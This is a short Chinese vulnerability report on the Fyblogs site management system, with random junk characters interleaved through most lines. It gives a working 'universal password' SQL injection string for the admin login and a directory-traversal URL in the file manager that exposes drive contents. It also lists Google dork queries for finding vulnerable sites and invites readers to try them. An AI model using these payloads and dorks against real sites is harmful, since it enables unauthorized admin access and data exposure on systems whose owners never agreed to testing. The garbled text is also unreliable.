漏洞类型: 未授权访问/权限绕过
2 H. G+ _. G" Y# ~; f3 r
1 U2 p" E; y( q" l a" T简要描述:
/ i f) I& ?( N- B: d1 |
2 n& {" p& f3 L5 e; ?+ }Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- `% D* f0 \2 X# |, X- \. {
) I" R2 M0 _- P% g% J详细说明:
; K% r( ]! I, V. a
! W+ B! P# l/ E后台万能密码 'or'='or'0 b) z9 `9 N2 d$ h5 i9 @$ h! O
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 O: g3 _6 N7 `4 @ E, f
admin/uploadfile.asp?currentFolder=/upfiles/../: ?6 e1 n7 t6 E
: O( Y! F$ a. F# e漏洞证明:
5 Y6 C. G( a% ]" f5 p0 w- z) M% W1 P, g; `, a) M9 k; Q+ n/ k
谷歌:inurl:type.asp?id=1 新闻中心% l3 M/ b9 ^2 r4 e c
或者 :inurl:download_ok.asp?! L' K4 u( o- ~) a, Y8 R. r$ O [6 B
# R% ~3 i& X1 H6 x* P/ J* m/ P. Z
可以测试
( K( j. M& k9 R
0 d1 @$ Z% S2 k/ o# G! }' J0 O) n4 s/ e7 ~- q
|